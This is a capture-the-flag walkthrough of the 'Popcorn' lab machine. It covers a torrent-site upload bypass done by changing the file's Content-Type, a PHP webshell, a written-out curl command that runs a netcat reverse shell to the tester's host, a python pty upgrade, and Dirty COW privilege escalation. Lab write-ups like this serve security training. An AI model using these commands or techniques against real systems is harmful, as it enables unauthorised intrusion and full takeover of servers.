My Attempt

User.txt

Enumeration

After discovering port 80 is open, I used dirsearch to go through the directories. Using dirsearch only reveals the /test directory which shows the PHP information page.

Following writeup

In the writeup, gobuster was used instead and it discovered other 2 directories /torrent and /rename. Following the writeup, I tried to access the /torrent file and followed the writeup to upload a torrent file. First I have to create a dummy account with the credentials "test:test" to login to the control panel.

By navigating to the Upload section, I was presented and upload page. According to the writeup, the page only allows legitimate torrent file to be uploaded. I used one of the torrent file from the Kali Linux download page and uploaded the file.

Then by editing the torrent, I am able to upload a PHP webshell through the update screenshot section.

Manipulating File Type

The trick was to intercept the upload request through burp suite and change the upload type of the file to image/jpeg. This way the server will thought that the file is an image file and accept the upload.

Then from the torrent file page we can find the link to the PHP webshell.

Now we have command execution.

We can create a reverse shell by issuing a netcat command from the webshell. We will send the command through curl as shown below.

curl -G http://10.10.10.6/torrent/upload/1e4cc12d6117f7d1bce4d7df164eecf3c1875f8c.php --data-urlencode "cmd=nc -nv 10.10.14.9 443 -e /bin/bash"

By setting up a listener on the kali machine and issue the command through the webshell, we can obtain a reverse shell.

We can spawn a tty shell using the following command.

python -c 'import pty; pty.spawn("/bin/bash")'

The user.txt file can be found in the home folder of the user "george".

Root.txt

My typical first and second try for Linux Privilege Escalation is always using "sudo -l" and "find / -type f -perm -4000 2>/dev/null" to check if I have sudo privilege or is there any SUID files. Unfortunately no luck on both attempts.

On the home folder of george, there is an interesting zip file.

Upon further inspection, the file does not reveal useful information for privilege escalation.

This machine is running on Linux Kernel 2.6.31. By searching the kernel version on Google, I was able to find a dirty cow exploitation for this Linux Kernel version.

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)Exploit Database

By uploading the exploit to the server, I was able to compile the code on the server and execute it.

The exploit hangs after I enter the new password. By reconnecting the reverse shell, we can see that the root user has been replaced by the "firefart" user.

Now by switching to the user "firefart", we can obtain a root shell.

PreviousPopcorn NextLessons Learned

Last updated 3 years ago